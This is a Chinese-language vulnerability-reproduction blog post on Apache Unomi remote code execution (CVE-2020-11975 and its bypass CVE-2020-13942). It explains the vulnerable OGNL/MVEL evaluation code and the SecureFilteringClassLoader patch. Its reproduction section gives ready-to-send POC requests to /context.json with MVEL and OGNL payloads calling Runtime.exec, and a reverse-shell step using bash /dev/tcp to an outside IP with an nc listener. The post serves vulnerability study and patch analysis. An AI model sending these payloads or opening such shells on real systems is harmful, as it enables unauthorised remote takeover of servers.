当前位置:网站首页>漏洞复现----37、Apache Unomi 远程代码执行漏洞 (CVE-2020-13942)
漏洞复现----37、Apache Unomi 远程代码执行漏洞 (CVE-2020-13942)
2022-06-30 16:46:00 【七天啊】
文章目录
一、Apache Unomi简介
Apache Unomi(发音为“You know me”)是一个 Java 开源客户数据平台,一个 Java 服务器,旨在管理客户、潜在客户和访问者数据并帮助个性化客户体验,同时还提供尊重访问者隐私规则(如 GDPR)的功能。
二、CVE-2020-11975漏洞
在 Apache Unomi<1.5.1的版本中,远程攻击者发送带有MVEL和OGNL表达式的请求,导致远程代码执行,权限是Unomi应用程序的运行权限,漏洞编号为CVE-2020-11975。而CVE-2020-13942是对CVE-2020-11975补丁的绕过。
2.1、CVE-2020-11975漏洞代码
下述代码段解析:
PropertyConditionEvaluator类负责conditions(条件)内的OGNL表达式的计算/执行。
public class PropertyConditionEvaluator implements ConditionEvaluator {
...
protected Object getOGNLPropertyValue(Item item, String expression) throws Exception {
ExpressionAccessor accessor = getPropertyAccessor(item, expression);
return accessor != null ? accessor.get(getOgnlContext(), item) : null;
}
...
集合上述代码,我们分析:当Unomi收到如下数据时,Unomi会如何执行:
{
"condition":{
"parameterValues":{
"propertyName":"Uname1 Uname2",
"comparisonOperator":"equals",
"propertyValue":"male"
}
}
}
1、Unomi根据用户输入的
属性名称(property name),查找硬编码的属性(hardcoded properties)。
2、找不到时,则调用getOGNLPropertyValue方法,该方法将用户输入的属性名称(property name)作为一条OGNL表达式,计算/执行这个"属性名称"。
3、在计算/执行OGNL表达式时,ExpressionAccessor使用"默认参数"(default parameters),从而导致了任意OGNL表达式的计算/执行。
CVE-2020-11975 OGNL注入POC如下:
POST /context.json HTTP/1.1
Host: localhost:8181
Connection: close
Content-Length: 749
{
"filters": [
{
"id": "sample",
"filters": [
{
"condition": {
"parameterValues": {
"":"script::Runtime r = Runtime.getRuntime(); r.exec(\"ping dnslog\");"
},
"type":"profilePropertyCondition"
}
}
]
}
],
"sessionId": "sample"
}
2.2、CVE-2020-11975漏洞修复代码
变更1:OGNL处理过程增加了SecureFilteringClassLoader
将SecureFilteringClassLoader添加到getOGNLPropertyValue()方法的OgnlContext中,以防止计算/执行任意OGNL表达式。
public class PropertyConditionEvaluator implements ConditionEvaluator {
...
protected Object getOGNLPropertyValue(Item item, String expression) throws Exception {
ClassLoader secureFilteringClassLoader = new SecureFilteringClassLoader(PropertyConditionEvaluator.class.getClassLoader());
OgnlContext ognlContext = getOgnlContext(secureFilteringClassLoader);
ExpressionAccessor accessor = getPropertyAccessor(item, expression, ognlContext, secureFilteringClassLoader);
return accessor != null ? accessor.get(ognlContext, item) : null;
}
...
变更2:MVEL处理过程增加了
SecureFilteringClassLoader
将SecureFilteringClassLoader添加到getOGNLPropertyValue()方法的OgnlContext中,以防止计算/执行任意OGNL表达式。
public class ConditionContextHelper {
...
private static Object executeScript(Map<String, Object> context, String script) {
final ClassLoader tccl = Thread.currentThread().getContextClassLoader();
try {
if (!mvelExpressions.containsKey(script)) {
ClassLoader secureFilteringClassLoader = new SecureFilteringClassLoader(ConditionContextHelper.class.getClassLoader());
Thread.currentThread().setContextClassLoader(secureFilteringClassLoader);
ParserConfiguration parserConfiguration = new ParserConfiguration();
parserConfiguration.setClassLoader(secureFilteringClassLoader);
mvelExpressions.put(script, MVEL.compileExpression(script, new ParserContext(parserConfiguration)));
}
return MVEL.executeExpression(mvelExpressions.get(script), context);
...
变更3:引入了
SecureFilteringClassLoader–安全过滤的ClassLoader
SecureFilteringClassLoader类重写了ClassLoader类的loadClass()方法,在预定义的集合(predefined set)中明确限制了可访问的类(accessible classes),并根据allowlist和blocklist来检查表达式中使用的类:
如果匹配中了blocklist,则抛出异常;
如果没匹配中allowlist,则抛出异常;
以此来限制计算/执行任意MVEL和OGNL表达式。
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
if (forbiddenClasses != null && classNameMatches(forbiddenClasses, name)) {
throw new ClassNotFoundException("Access to class " + name + " not allowed");
}
if (allowedClasses != null && !classNameMatches(allowedClasses, name)) {
throw new ClassNotFoundException("Access to class " + name + " not allowed");
}
return delegate.loadClass(name);
}
三、CVE-2020-13942漏洞
CVE-2020-11975 主要通过引入SecureFilteringClassLoader函数,重写ClassLoder类的loadClass()方法,通过黑白名单的方式过滤掉表达式中使用的类,以此来进行防御。
但是MVEL表达式可以直接使用已实例化的类(例Runtime或System),不调动loadClass(),以此来绕过SecureFilteringClassLoader。
复现步骤:
3.1、执行MVEL表达式
访问IP:8181抓包更改请求为:
POST /context.json
Content-Type为:application/json
执行curl 监听端IP:port
监听端执行
nc -lvvp 6666
POC见下:
{
"filters": [
{
"id": "sample",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"command\");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "sample"
}
3.2、执行OGNL表达式
访问IP:8181抓包更改请求为:
POST /context.json
Content-Type为:application/json
执行curl 监听端IP:port
监听端执行
nc -lvvp 6666
POC见下:
{
"personalizations":[
{
"id":"gender-test",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#runtimeclass =#this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod =#runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj= #getruntimemethod.invoke(null,null)).(#execmethod =#runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{?#this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{?#this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"command\"))",
"comparisonOperator":"equals",
"propertyValue":"male"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"sample"
}
3.3、反弹shell
访问IP:8181抓包更改请求为:
POST /context.json
Content-Type为:application/json
执行bash -i >& /dev/tcp/10.211.55.3/6666 0>&1,需要进行base64加密。
监听端执行
nc -lvvp 6666
参考: https://github.com/apache/unomi/blob/206b646eb5cfa1e341ca7170705721de9b5b9716/persistence-elasticsearch/core/src/main/java/org/apache/unomi/persistence/elasticsearch/conditions/ConditionContextHelper.java#L81-L89 https://github.com/apache/unomi/commit/823386ab117d231df15eab4cb4b7a98f8af546ca
https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi-rce-zh.md
边栏推荐
- 基于SSH的客户关系CRM管理系统
- [software testing] basic knowledge of software testing you need to know
- uni-app进阶之自定义【day13】
- 港科大&MSRA新研究:关于图像到图像转换,Finetuning is all you need
- DeFi借贷协议机制对比:Euler、Compound、Aave和Rari Capital
- 2022上半年盘点:20+主流数据库重大更新及技术要点汇总
- 5g has been in business for three years. Where will innovation go in the future?
- NFT铸造交易平台开发详情
- MIT科技评论2022年35岁以下创新者名单发布,含AlphaFold作者等
- Design and principle of tubes responsive data system
猜你喜欢
Apache parsing vulnerability (cve-2017-15715)_ Vulnerability recurrence
墨天轮沙龙 | 清华乔嘉林:Apache IoTDB,源于清华,建设开源生态之路
Tubes响应性数据系统的设计与原理
Deep understanding of JVM (III) - memory structure (III)
Design of online shopping mall based on SSH
Building a basic buildreoot file system
![[Architecture] 1366- how to draw an excellent architecture diagram](/img/98/5dc29e08e91e751f67d910fadc6430.jpg)
[Architecture] 1366- how to draw an excellent architecture diagram
What did Tongji and Ali study in the CVPR 2022 best student thesis award? This is an interpretation of yizuo
基于eNSP的校园网设计的仿真模拟
基于SSH的网上商城设计
随机推荐
4 years of working experience, and you can't tell the five communication modes between multithreads. Can you believe it?
Deep understanding of JVM (VI) -- garbage collection (III)
Redis (IV) - delete policy
NFT铸造交易平台开发详情
Simulation of campus network design based on ENSP
Partition marble (multiple knapsack + binary optimization)
如何写一个技术方案
News management system based on SSM
VS code 树视图 treeView
2022上半年盘点:20+主流数据库重大更新及技术要点汇总
Redis (VII) - sentry
【剑指Offer】剑指 Offer 53 - II. 0~n-1中缺失的数字
Compile and generate busybox file system
Ten thousand volumes - list sorting [01]
Php8.0 environment detailed installation tutorial
Inventory in the first half of 2022: summary of major updates and technical points of 20+ mainstream databases
IEEE TBD SCI影响因子提升至4.271,位列Q1区!
每日面试1题-如何防止CDN防护被绕过
MySQL advanced - basic index and seven joins
LRN local response normalization